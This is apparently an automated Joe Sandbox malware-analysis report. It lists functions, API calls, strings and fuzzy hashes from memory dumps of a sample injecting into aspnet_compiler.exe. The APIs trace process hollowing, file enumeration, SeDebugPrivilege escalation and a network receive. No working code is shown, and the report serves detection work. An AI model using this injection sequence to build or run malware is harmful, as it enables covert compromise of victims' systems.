Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd

Similarity

API ID: CreateProcess
String ID: NH>
API String ID: 963392458-2295643262
Opcode ID: edd0c3637d0191eed72d0d7321af9b06cedf4c3aaa981fddc1057ee4fb1970ff
Instruction ID: 3eed19fe2d2058f602624d8d040377ea2fdf66cac292f1151c209472e459ecb2
Opcode Fuzzy Hash: edd0c3637d0191eed72d0d7321af9b06cedf4c3aaa981fddc1057ee4fb1970ff
Instruction Fuzzy Hash: 5681B0B5D0022D9FDF24CF69D940BEDBBF5AB19304F0490AAE548B7220DB749A85CF94

Function 032268A8 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 236
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 03226A87

Strings

NH>, xrefs: 032268E9

Memory Dump Source

Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd

Similarity

API ID: CreateProcess
String ID: NH>
API String ID: 963392458-2295643262
Opcode ID: 92a229fccc8e15ec6feaafcc57043d87d8fc3a30c7d3c24d9170800dff3beb4b
Instruction ID: 7f1d3e1a0b11bbf710d18128bb36975982cb0038fa4f8946c63452d7c6a7b941
Opcode Fuzzy Hash: 92a229fccc8e15ec6feaafcc57043d87d8fc3a30c7d3c24d9170800dff3beb4b
Instruction Fuzzy Hash: 4181B075D0022D9FDB24CFA9C940BDDBBF5AB09304F0490EAE548B7220DB749A85CF94

Function 03226CE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 03226D9D

Strings

NH>, xrefs: 03226D15

Memory Dump Source

Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd

Similarity

API ID: MemoryProcessRead
String ID: NH>
API String ID: 1726664587-2295643262
Opcode ID: e34009cfdc28710b35fadc6b2e6173f6dcfa87c39b9264b9de295225fc8bc20b
Instruction ID: 92ebd7e4f4ad6d9dbfc03192fa41089f0557cc1f5bdab310fd06d3768e86638e
Opcode Fuzzy Hash: e34009cfdc28710b35fadc6b2e6173f6dcfa87c39b9264b9de295225fc8bc20b
Instruction Fuzzy Hash: 3641BCB9D04258DFCF10CFA9D884ADEFBB1BB1A310F14916AE824BB250C375A945CF65

Function 03226F08 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 111
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 03226FDE

Strings

NH>, xrefs: 03226F35

Memory Dump Source

Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: NH>
API String ID: 3559483778-2295643262
Opcode ID: eb84b26b12e59bf3289b84db15db8d9542ab99c9387af04ff769c65dc351d193
Instruction ID: a9f0fd668970bb912e7dd32dfafcf999b564ef44631e660a082c9e287f620466
Opcode Fuzzy Hash: eb84b26b12e59bf3289b84db15db8d9542ab99c9387af04ff769c65dc351d193
Instruction Fuzzy Hash: 7D4178B5D042589FCF10CFA9D984AEEFBF1BB49310F24902AE818B7250D375AA45CF64

Function 03226F10 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 03226FDE

Strings

NH>, xrefs: 03226F35

Memory Dump Source

Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: NH>
API String ID: 3559483778-2295643262
Opcode ID: 3371b2de52868d1da3c95d88f187e2f3296780ff6137f92db645d702401577f3
Instruction ID: 610922016155bc287dbca7853b8063b41ec14708346dfe308df9a32ae5ded3ef
Opcode Fuzzy Hash: 3371b2de52868d1da3c95d88f187e2f3296780ff6137f92db645d702401577f3
Instruction Fuzzy Hash: 104168B9D042589FCF10CFA9D984ADEFBF1BB09314F24902AE818B7250D375AA45CF64

Function 03226CF0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 03226D9D

Strings

NH>, xrefs: 03226D15

Memory Dump Source

Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd

Similarity

API ID: MemoryProcessRead
String ID: NH>
API String ID: 1726664587-2295643262
Opcode ID: 08fa89fc2e744b3e862041f2eb31e0b5ed99c7ac91de45f4d83a8a165954e7bd
Instruction ID: a579998ecf7746fa8d07a8cb5c6c1f484b266343c2be6c0315c13bbdc157eba8
Opcode Fuzzy Hash: 08fa89fc2e744b3e862041f2eb31e0b5ed99c7ac91de45f4d83a8a165954e7bd
Instruction Fuzzy Hash: B73187B9D04268DFCF10CFAAD984ADEFBB1BB09310F10A02AE814B7210D375A945CF64

Function 03226BD8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 03226C8A

Strings

NH>, xrefs: 03226C02

Memory Dump Source

Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd

Similarity

API ID: ContextThreadWow64
String ID: NH>
API String ID: 983334009-2295643262
Opcode ID: f1a6686a7dc233447befb473b7ee50c4441c730a82a64c0d247d8eac45d4864f
Instruction ID: f91823e011327a33ae3206b57d88280443ece9b26fe9bfa7fcf0734f152ee8a1
Opcode Fuzzy Hash: f1a6686a7dc233447befb473b7ee50c4441c730a82a64c0d247d8eac45d4864f
Instruction Fuzzy Hash: 6441EBB5D112589FCB10CFA9D884ADDFBF1FB09314F14802AE418B7250D3789985CF94

Function 03226E00 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 03226EAD

Strings

NH>, xrefs: 03226E25

Memory Dump Source

Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd

Similarity

API ID: AllocVirtual
String ID: NH>
API String ID: 4275171209-2295643262
Opcode ID: a0b30f20d03bdbe4fff0103119597e912bfea4e17d1ac3f761725b30b1f84e73
Instruction ID: 57406c50646ff8e86e66992554881e98dd71097fa3a6db77ae92bad3c25681bb
Opcode Fuzzy Hash: a0b30f20d03bdbe4fff0103119597e912bfea4e17d1ac3f761725b30b1f84e73
Instruction Fuzzy Hash: 863167B9D04258DFCF10CFA9E984A9EFBB1AB59310F14901AE818B7310D375A945CF65

Function 03226E08 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 95
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 03226EAD

Strings

NH>, xrefs: 03226E25

Memory Dump Source

Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd

Similarity

API ID: AllocVirtual
String ID: NH>
API String ID: 4275171209-2295643262
Opcode ID: e4cace24b18b0c6b5306940b1b60255f3a2e9c0e67099015ec76678b49083a01
Instruction ID: 129c33b6ee7ce9a169c2ed3c93e11015e8c9f5cfe5d725ebae1b27fbdace6bd2
Opcode Fuzzy Hash: e4cace24b18b0c6b5306940b1b60255f3a2e9c0e67099015ec76678b49083a01
Instruction Fuzzy Hash: E83154B9D04258EFCF10CFA9E984A9EFBB5BB19310F10A02AE814B7310D375A945CF65

Function 03226BE0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 03226C8A

Strings

NH>, xrefs: 03226C02

Memory Dump Source

Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd

Similarity

API ID: ContextThreadWow64
String ID: NH>
API String ID: 983334009-2295643262
Opcode ID: f2521a45c166eb18cdd4a42587396beb21a31fbf39c385154eb557549b2c57a4
Instruction ID: 2de762988bc171de7aa69b0cbaa0189fe6bd795214adabb4b762eb47a49ce34b
Opcode Fuzzy Hash: f2521a45c166eb18cdd4a42587396beb21a31fbf39c385154eb557549b2c57a4
Instruction Fuzzy Hash: 78317AB5D012589FCB10CFAAD984ADEFBF1FB49314F24902AE418B7250D379A985CF64

Function 03227048 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 032270C6

Strings

NH>, xrefs: 0322706D

Memory Dump Source

Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd

Similarity

API ID: ResumeThread
String ID: NH>
API String ID: 947044025-2295643262
Opcode ID: 4efaed082e49636cdeb07ef94d0683bacc23845bc969f0944f8f4ac89256f973
Instruction ID: b79d5ef96220efeafe24ef91030be2aefb07a3c0c3d7535838f0578feac73196
Opcode Fuzzy Hash: 4efaed082e49636cdeb07ef94d0683bacc23845bc969f0944f8f4ac89256f973
Instruction Fuzzy Hash: 9621A8B8D04258DFCB10CFA9D984ADEFBF0AB49310F24905AE818B7310D335A945CFA9

Function 03227050 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 032270C6

Strings

NH>, xrefs: 0322706D

Memory Dump Source

Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd

Similarity

API ID: ResumeThread
String ID: NH>
API String ID: 947044025-2295643262
Opcode ID: ece6be089ef3deb639c76ad3360dca9c398a4c6c94327dd6046a7097b476dda5
Instruction ID: 539e8512ac6058ca2922af76a16a880ca0e697d314b9931051d0c0c97f537805
Opcode Fuzzy Hash: ece6be089ef3deb639c76ad3360dca9c398a4c6c94327dd6046a7097b476dda5
Instruction Fuzzy Hash: 542199B8D042589FCB10CFA9D984ADEFBF4EB09320F14905AE818B7310D375A945CFA9

Function 03250A5F Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750266188.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_1e#U0414.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e66989ad3eb1a54306037b693129ccb96b30b3423d1aa2bb74dffb798d27bbc
Instruction ID: b428981be826055572eb108f31b5732291a52b84e69cfa70c5426c3112946279
Opcode Fuzzy Hash: 4e66989ad3eb1a54306037b693129ccb96b30b3423d1aa2bb74dffb798d27bbc
Instruction Fuzzy Hash: B52103B5E042498FCF01CFA8D840AEEBBF1FB49320F1490AAE814B7351D7359A50CB65

Function 03250A80 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750266188.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_1e#U0414.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 299ed9eaa787a572de32255036fde4ebc649e1d2aa853014c66a9077b58538f9
Instruction ID: 7e7bbf824c52c9649cd1949c1aeb34f50844ba8bcfeb925db3b89149a4a6ff21
Opcode Fuzzy Hash: 299ed9eaa787a572de32255036fde4ebc649e1d2aa853014c66a9077b58538f9
Instruction Fuzzy Hash: 0D118DB5E0021A9FCF15CFA9D8409EEBBF1BB49310F10942AE914B3350D7319A50DFA4

Function 032509B3 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750266188.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_1e#U0414.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b917fdf09029599534836507fcf53b74fdeeeb965ad0f9be13e34f6d03cdf263
Instruction ID: 8a0b67658046e7ccefc6929999d04051fdd0caa31a3fcbcc2c0ad98f506595f6
Opcode Fuzzy Hash: b917fdf09029599534836507fcf53b74fdeeeb965ad0f9be13e34f6d03cdf263
Instruction Fuzzy Hash: 93F0C772D082849FCB42CFA8D8522C8BFB0EB06320F0881EBD814C3321D7388A86DB50

Function 03250413 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750266188.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_1e#U0414.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daa967c9f5d070d03dd8052348cca592d0234835da7d9a8e222822bfc8615507
Instruction ID: b17ac4957605cb54e26915ae8a9baea645c097f77ab2e883972227f3ec0771d5
Opcode Fuzzy Hash: daa967c9f5d070d03dd8052348cca592d0234835da7d9a8e222822bfc8615507
Instruction Fuzzy Hash: A7018C35A483449FCB41CFA8D484A9CBFF0EF49320F1580EBE844D7262C6348A84DB01

Function 0325055F Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750266188.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_1e#U0414.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8e406440daac56e36933c8b4334e85667fea6661f3787e7fe63d4b85884962e
Instruction ID: e9c320ff30dc40c620c27ed88c10bbb3f6d8d5958094c75f3ee95a3901aafe34
Opcode Fuzzy Hash: f8e406440daac56e36933c8b4334e85667fea6661f3787e7fe63d4b85884962e
Instruction Fuzzy Hash: F1F01D7594E3859FC742CFB8D8555987FB0AF07220B1A41EBD444CB6B3D6384E45CB11

Function 032503C3 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750266188.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_1e#U0414.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f95fd301923d7b133076406962fd98a21275d107a1c5613707f8c2561e52ec5
Instruction ID: 7a817fb141866fa9419ce0d821335e558b48719688bde50d16623eb899481ec5
Opcode Fuzzy Hash: 3f95fd301923d7b133076406962fd98a21275d107a1c5613707f8c2561e52ec5
Instruction Fuzzy Hash: F9F05E71A49344DFC706CBA4E8246AD7BF0EB46260B2A85EBD004DB5A2DB798E45C711

Function 0325095B Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750266188.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_1e#U0414.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8752ff12ee53f9243b2e2e81fb749327ba31cf3238ee35e23feb4320008bb4dd
Instruction ID: 9b56fa9ce52118e8e45e70e226b68885bd96817ed9104b53c429b61c6dc1b18c
Opcode Fuzzy Hash: 8752ff12ee53f9243b2e2e81fb749327ba31cf3238ee35e23feb4320008bb4dd
Instruction Fuzzy Hash: 25F06734D08308AFCB51CFA8A945ADCBFB0EB45320F1080EBD800A7221D7380A85DB81

Function 03250430 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750266188.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_1e#U0414.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 071f2a686c1ae43c3001c9d4071f77969307995b4e57c5cec1bd84e743909bf8
Instruction ID: 1645193e686d6a6988a8736b7bd54772843e594054e72d9f18190f90237489bf
Opcode Fuzzy Hash: 071f2a686c1ae43c3001c9d4071f77969307995b4e57c5cec1bd84e743909bf8
Instruction Fuzzy Hash: ADF0A578A00208EFCB40DFA8D545A9DBBF0FB48310F10C1A9E81897320D7319A50DB41

Function 03250232 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750266188.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_1e#U0414.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd0304c0b05383701aa7f308a405299b0a119dd3ea41d9b5d9bdb719b3fa6df5
Instruction ID: 8bdd97d311eee405f56073ef175a9c460c2295756aebeac0e3a02ee1b88877ce
Opcode Fuzzy Hash: fd0304c0b05383701aa7f308a405299b0a119dd3ea41d9b5d9bdb719b3fa6df5
Instruction Fuzzy Hash: BBE0C970D01309DFCB64DFA895406DDBBF0AF45315F2081BED414A6324D7354A91DB40

Function 032509D0 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750266188.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_1e#U0414.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfe325e3ce0d86bd0b177c4e5d547b30ab6af260c854f56f68d77126d7be39e2
Instruction ID: be9fd363d55898fd6512867dfa127026b69314795a04949e59820fd2115984d7
Opcode Fuzzy Hash: cfe325e3ce0d86bd0b177c4e5d547b30ab6af260c854f56f68d77126d7be39e2
Instruction Fuzzy Hash: 15E01A74E00208EFCB54DFA8D505A9DBBB4EB44300F10C1AAE814A3314D7355A90DF80

Function 03250238 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750266188.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_1e#U0414.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d649d25b0a16337a7244f9cd3310e03c98725b52b2e2eb8fef2880b77c14480b
Instruction ID: 8f0b1efeb80058f306cc58087ff3cf5db9fdc038ca2bb8b330aa16d48c9731da
Opcode Fuzzy Hash: d649d25b0a16337a7244f9cd3310e03c98725b52b2e2eb8fef2880b77c14480b
Instruction Fuzzy Hash: 3CE04674E01308EFCB54DFF8A5002ADBBF0AB45301F2081E9D818A3350DB348B80EB80

Function 03250978 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750266188.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_1e#U0414.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2930fe65d31ce55cfab0c3a5e4a0d80c422de2a03abf86b0784fade69d98d224
Instruction ID: 499dc17ffd9424c33c49f512ce699cd3b5d4716302c688349e0d209d80880396
Opcode Fuzzy Hash: 2930fe65d31ce55cfab0c3a5e4a0d80c422de2a03abf86b0784fade69d98d224
Instruction Fuzzy Hash: 1BE09A78E0020DEFCB54DFA8D545A9DFBB4AB44310F10C5A9A814A3354DB345A54DF95

Function 03250580 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750266188.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_1e#U0414.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 652dd735a2d3c46edbc9c3a64bd3936b5783b4a1b353c87f0e5dbfa2a11ef792
Instruction ID: 8d80f30c0f1e04682509da8cf3bc4465adc14144c3671494e7d2957d60aff8ef
Opcode Fuzzy Hash: 652dd735a2d3c46edbc9c3a64bd3936b5783b4a1b353c87f0e5dbfa2a11ef792
Instruction Fuzzy Hash: ABE0B678A11208DFC750DFA8D545A9DBFF4AB08311F5441A9E90497360EB309A50DB91

Function 032503E0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750266188.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_1e#U0414.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b6da0a94cd0b5a03a6fa9e4f83b926d7352d45b10aa5da2df66565f46c50204
Instruction ID: e2634cb29369909b57f1a4e46304d1ed31520826b15ee4e7849fc5739ecedf11
Opcode Fuzzy Hash: 6b6da0a94cd0b5a03a6fa9e4f83b926d7352d45b10aa5da2df66565f46c50204
Instruction Fuzzy Hash: 5AD01274A01209EBC700DFF9E50465DBBF8FB08350F1440A9A40493250DB715F50DB51

Non-executed Functions

Function 03221C40 Relevance: 1.6, Strings: 1, Instructions: 387COMMON

Download Yara Rule

Strings

poq, xrefs: 03221EE1

Memory Dump Source

Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd

Similarity

API ID:
String ID: poq
API String ID: 0-1570044193
Opcode ID: 27d4a1e34f8ca0071e9d5d1d2b2a08b34ac4a8845956b685e1787386f3c31d48
Instruction ID: 96552bd29c66644ec7b351d7a5d54ea2a9c1b05d7d387087029ec1d77c022b53
Opcode Fuzzy Hash: 27d4a1e34f8ca0071e9d5d1d2b2a08b34ac4a8845956b685e1787386f3c31d48
Instruction Fuzzy Hash: 3802D275A00218DFDB15CFA9C984E9DBBB2FF49304F1581A9E509AB232D732E991DF40

Function 03221C32 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b37fe4ee3458be5bce1ee38e056e5e2f095d9660acc9bd7b9f661b0ec853d6b2
Instruction ID: e30f634b61c8dbec18e1e7abc7cde7a0218a75d8be71fe3b4b65eb016b94eca1
Opcode Fuzzy Hash: b37fe4ee3458be5bce1ee38e056e5e2f095d9660acc9bd7b9f661b0ec853d6b2
Instruction Fuzzy Hash: 0851C675E10619DBDB18CFAAD940ADDFBF6BF89300F14C16AD509AB264DB30A991CF40

Analysis Process: aspnet_compiler.exePID: 6880, Parent PID: 6760COMMON

Execution Graph

Execution Coverage:	30.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.4%
Total number of Nodes:	1846
Total number of Limit Nodes:	93

Executed Functions

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

%s\*, xrefs: 00403D99
Program Files, xrefs: 00403E01
Windows, xrefs: 00403DEA
%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
